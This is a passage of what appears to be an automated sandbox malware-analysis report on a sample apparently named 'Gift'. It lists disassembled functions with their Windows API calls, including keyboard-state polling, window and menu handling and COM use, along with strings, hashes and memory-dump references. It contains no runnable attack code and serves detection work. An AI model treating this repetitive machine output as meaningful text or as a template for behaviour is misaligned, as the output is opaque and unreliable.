                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                          • String ID: 0$F
                                                                          • API String ID: 176399719-3044882817
                                                                          • Opcode ID: 73e5865118be7c5d46929d0f9187a711593fd148c72a2698556b046c8541d1df
                                                                          • Instruction ID: 0c2a5ee5832655a75c2d6664657be8d00b6c4530f868ec8ed66767b5b9b97e13
                                                                          • Opcode Fuzzy Hash: 73e5865118be7c5d46929d0f9187a711593fd148c72a2698556b046c8541d1df
                                                                          • Instruction Fuzzy Hash: F7416A74A04209EFDB12DF64E889EAABBB9FF49311F194029FD06A7360C771A914CF50
                                                                          Function 00357AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00357B83
                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00357B8A
                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00357B9D
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00357BA5
                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00357BB0
                                                                          • DeleteDC.GDI32(00000000), ref: 00357BB9
                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00357BC3
                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00357BD7
                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00357BE3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                          • String ID: static
                                                                          • API String ID: 2559357485-2160076837
                                                                          • Opcode ID: eb1dface0282057addb385be52a038b53d1a4fc1274de4f414434f5a1e9683b3
                                                                          • Instruction ID: ec25ac7b9dec829d625e172c890d98b900b1e3a02c670eedab85604ee691e7bb
                                                                          • Opcode Fuzzy Hash: eb1dface0282057addb385be52a038b53d1a4fc1274de4f414434f5a1e9683b3
                                                                          • Instruction Fuzzy Hash: 1D318832104219ABDF179FA4DC4AFDB3B6EFF09321F114215FA16A61A0C7B1D824DBA4
                                                                          Function 002F7030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 002F706B
                                                                            • Part of subcall function 002F8D58: __getptd_noexit.LIBCMT ref: 002F8D58
                                                                          • __gmtime64_s.LIBCMT ref: 002F7104
                                                                          • __gmtime64_s.LIBCMT ref: 002F713A
                                                                          • __gmtime64_s.LIBCMT ref: 002F7157
                                                                          • __allrem.LIBCMT ref: 002F71AD
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002F71C9
                                                                          • __allrem.LIBCMT ref: 002F71E0
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002F71FE
                                                                          • __allrem.LIBCMT ref: 002F7215
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002F7233
                                                                          • __invoke_watson.LIBCMT ref: 002F72A4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                          • String ID:
                                                                          • API String ID: 384356119-0
                                                                          • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                          • Instruction ID: 7e8a1a2e9f8c97f0a3fa3b44cc6e1579b9304f6003c90b0f47e954cc8e51c4c5
                                                                          • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                          • Instruction Fuzzy Hash: C571D871A1571BABE7149E79CC51B7AF3A8AF103A0F144239FA14D73C1EB70DA648B90
                                                                          Function 00332CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00332CE9
                                                                          • GetMenuItemInfoW.USER32(00397890,000000FF,00000000,00000030), ref: 00332D4A
                                                                          • SetMenuItemInfoW.USER32(00397890,00000004,00000000,00000030), ref: 00332D80
                                                                          • Sleep.KERNEL32(000001F4), ref: 00332D92
                                                                          • GetMenuItemCount.USER32(?), ref: 00332DD6
                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00332DF2
                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00332E1C
                                                                          • GetMenuItemID.USER32(?,?), ref: 00332E61
                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00332EA7
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00332EBB
                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00332EDC
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                          • String ID:
                                                                          • API String ID: 4176008265-0
                                                                          • Opcode ID: 9fdc386eb1b395340dbde5ac01eb4bad2308562f5967a89310c1d006c74188c5
                                                                          • Instruction ID: 9e8445c7c2189ed5ba4f152aa256974120563d74599366ba55bc45415220c37e
                                                                          • Opcode Fuzzy Hash: 9fdc386eb1b395340dbde5ac01eb4bad2308562f5967a89310c1d006c74188c5
                                                                          • Instruction Fuzzy Hash: D261BC70900249AFDB22CF64CCCAABFBBBCEB41304F15445AF951A72A1D772AD45DB21
                                                                          Function 00357548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003575CA
                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003575CD
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003575F1
                                                                          • _memset.LIBCMT ref: 00357602
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00357614
                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0035768C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow_memset
                                                                          • String ID:
                                                                          • API String ID: 830647256-0
                                                                          • Opcode ID: 82c40c605643468e31c00cf060854b6cba0daa90fbacdd878435760c7b95341f
                                                                          • Instruction ID: 2fa56b9c5c1d009ffb1d9386b418987ae44a96dcab540e13e27d022e359d2543
                                                                          • Opcode Fuzzy Hash: 82c40c605643468e31c00cf060854b6cba0daa90fbacdd878435760c7b95341f
                                                                          • Instruction Fuzzy Hash: 0D61AB75904208AFDB12DFA4DC81EEE77F8EB09740F10019AFE15A72A1D770AD45DB60
                                                                          Function 003277B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003277DD
                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00327836
                                                                          • VariantInit.OLEAUT32(?), ref: 00327848
                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00327868
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 003278BB
                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 003278CF
                                                                          • VariantClear.OLEAUT32(?), ref: 003278E4
                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 003278F1
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003278FA
                                                                          • VariantClear.OLEAUT32(?), ref: 0032790C
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00327917
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                          • String ID:
                                                                          • API String ID: 2706829360-0
                                                                          • Opcode ID: 8f74a308f60683fa5b958f8ec6f6551bbe81e541d2dfa77aa2fe7f84e6fe35d4
                                                                          • Instruction ID: 0e59f20922864e3b99373b08ba031e5d35491c3ef6061e0f77bfa8ed73ba0736
                                                                          • Opcode Fuzzy Hash: 8f74a308f60683fa5b958f8ec6f6551bbe81e541d2dfa77aa2fe7f84e6fe35d4
                                                                          • Instruction Fuzzy Hash: 29417735A00219DFCB16DFA9D849DAEBBB9FF08340F00C469E955A7261CB70E945CF90
                                                                          Function 00330508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 00330530
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 003305B1
                                                                          • GetKeyState.USER32(000000A0), ref: 003305CC
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 003305E6
                                                                          • GetKeyState.USER32(000000A1), ref: 003305FB
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00330613
                                                                          • GetKeyState.USER32(00000011), ref: 00330625
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0033063D
                                                                          • GetKeyState.USER32(00000012), ref: 0033064F
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00330667
                                                                          • GetKeyState.USER32(0000005B), ref: 00330679
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: d73d9b0b32b53bbca133c7558301f4f2317f9f80a840422a01c4fb298f6ff7b1
                                                                          • Instruction ID: c82e49e56686710485724bc460db60e3db74d36c4a9ab0710df5c034ac91720b
                                                                          • Opcode Fuzzy Hash: d73d9b0b32b53bbca133c7558301f4f2317f9f80a840422a01c4fb298f6ff7b1
                                                                          • Instruction Fuzzy Hash: E341DB305087C96DFF3B876488A53B6FEA4AB52304F09805ED6C6475C1EBE499D4CF92
                                                                          Function 00348AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • CoInitialize.OLE32 ref: 00348AED
                                                                          • CoUninitialize.OLE32 ref: 00348AF8
                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00363BBC,?), ref: 00348B58
                                                                          • IIDFromString.OLE32(?,?), ref: 00348BCB
                                                                          • VariantInit.OLEAUT32(?), ref: 00348C65
                                                                          • VariantClear.OLEAUT32(?), ref: 00348CC6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                          • API String ID: 834269672-1287834457
                                                                          • Opcode ID: fa7a7f2fcc2d17c247c63f44333308ff5f49b1d4113e10159a789ed39a50ea45
                                                                          • Instruction ID: a23cb0e31ee4feb116ae6be422a735daefd81dae3314effb767641f38cd1c089
                                                                          • Opcode Fuzzy Hash: fa7a7f2fcc2d17c247c63f44333308ff5f49b1d4113e10159a789ed39a50ea45
                                                                          • Instruction Fuzzy Hash: 19618C706087119FD712EF64C889B6EF7E8EF44714F00485AF9859B691CB70ED48CBA2
                                                                          Function 0033BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0033BB13
                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0033BB89
                                                                          • GetLastError.KERNEL32 ref: 0033BB93
                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0033BC00
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                          • API String ID: 4194297153-14809454
                                                                          • Opcode ID: f209405bc010a75eb33f40d5813499617b906d1250b23eb40e688f936f29d1a7
                                                                          • Instruction ID: 1299edad2fb6d3c64332cd6ec575b10bc0e4396cca79e72b2cfa1c21e3d1396d
                                                                          • Opcode Fuzzy Hash: f209405bc010a75eb33f40d5813499617b906d1250b23eb40e688f936f29d1a7
                                                                          • Instruction Fuzzy Hash: CE31B035A00309AFCB12EF65C896EAEF7B8EF44340F14856AEA06D7295DF709D01CB91
                                                                          Function 003334DD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 82windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 0033357C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: IconLoad
                                                                          • String ID: ,z90z9$,z90z9$blank$info$question$stop$warning
                                                                          • API String ID: 2457776203-2095212449
                                                                          • Opcode ID: 78ff4887eb9b493475f4c400784746f7fccab8d8ad49ec76b4950a46950ca50e
                                                                          • Instruction ID: 634b51c2c4f3449a34a89b72c5c713a36539a65f59c6b71c0479d536bd7a8c57
                                                                          • Opcode Fuzzy Hash: 78ff4887eb9b493475f4c400784746f7fccab8d8ad49ec76b4950a46950ca50e
                                                                          • Instruction Fuzzy Hash: D8110D7164834BBEFB079A14DCD2DBBB79CDF06360F20406AF6045A181E7A4AF404BB0
                                                                          Function 00329B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0032B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0032B7BD
                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00329BCC
                                                                          • GetDlgCtrlID.USER32 ref: 00329BD7
                                                                          • GetParent.USER32 ref: 00329BF3
                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00329BF6
                                                                          • GetDlgCtrlID.USER32(?), ref: 00329BFF
                                                                          • GetParent.USER32(?), ref: 00329C1B
                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00329C1E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 1536045017-1403004172
                                                                          • Opcode ID: 254d77198c6aaea97e53e85591c3600c9ea52663c860f104e3a04a7f0507ebfb
                                                                          • Instruction ID: 42ea072a399858c903a2032060dcdfb4b3fa5174c551f2b1331900b085d2c772
                                                                          • Opcode Fuzzy Hash: 254d77198c6aaea97e53e85591c3600c9ea52663c860f104e3a04a7f0507ebfb
                                                                          • Instruction Fuzzy Hash: 5B21F170940114ABDF06AB65DC95EFEBBB8EF95300F104156F961972A1DBB44824DB20
                                                                          Function 00329C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0032B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0032B7BD
                                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00329CB5
                                                                          • GetDlgCtrlID.USER32 ref: 00329CC0
                                                                          • GetParent.USER32 ref: 00329CDC
                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00329CDF
                                                                          • GetDlgCtrlID.USER32(?), ref: 00329CE8
                                                                          • GetParent.USER32(?), ref: 00329D04
                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00329D07
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 1536045017-1403004172
                                                                          • Opcode ID: 170fd88c203a21982e6781b3ebc5173958123153bc4b5a62bbd8555021ad27ae
                                                                          • Instruction ID: ab5a2cc0dc20eddde76e51e161a2530b1526cae9d91af733b137eff14fa7e2cb
                                                                          • Opcode Fuzzy Hash: 170fd88c203a21982e6781b3ebc5173958123153bc4b5a62bbd8555021ad27ae
                                                                          • Instruction Fuzzy Hash: 7721F571D40114BFDF06AB65CC95EFEBBB9EF95300F104012F961972A1DBB54924DB20
                                                                          Function 00329D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32 ref: 00329D27
                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00329D3C
                                                                          • _wcscmp.LIBCMT ref: 00329D4E
                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00329DC9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                          • API String ID: 1704125052-3381328864
                                                                          • Opcode ID: f53e88d737c69500bb89319abd692c9e3421a060723460fda2d8e60722a00022
                                                                          • Instruction ID: ec8f3fcfdede00e7a024447e1c875f0f4f9582e5587cd0dcef05972ab1804358
                                                                          • Opcode Fuzzy Hash: f53e88d737c69500bb89319abd692c9e3421a060723460fda2d8e60722a00022
                                                                          • Instruction Fuzzy Hash: F2112C7624872ABAF6077624FC07EF7B39CDB05360F200067FA04A44D1FEA5A9616E75
                                                                          Function 00348F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 00348FC1
                                                                          • CoInitialize.OLE32(00000000), ref: 00348FEE
                                                                          • CoUninitialize.OLE32 ref: 00348FF8
                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 003490F8
                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00349225
                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00363BDC), ref: 00349259
                                                                          • CoGetObject.OLE32(?,00000000,00363BDC,?), ref: 0034927C
                                                                          • SetErrorMode.KERNEL32(00000000), ref: 0034928F
                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0034930F
                                                                          • VariantClear.OLEAUT32(?), ref: 0034931F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
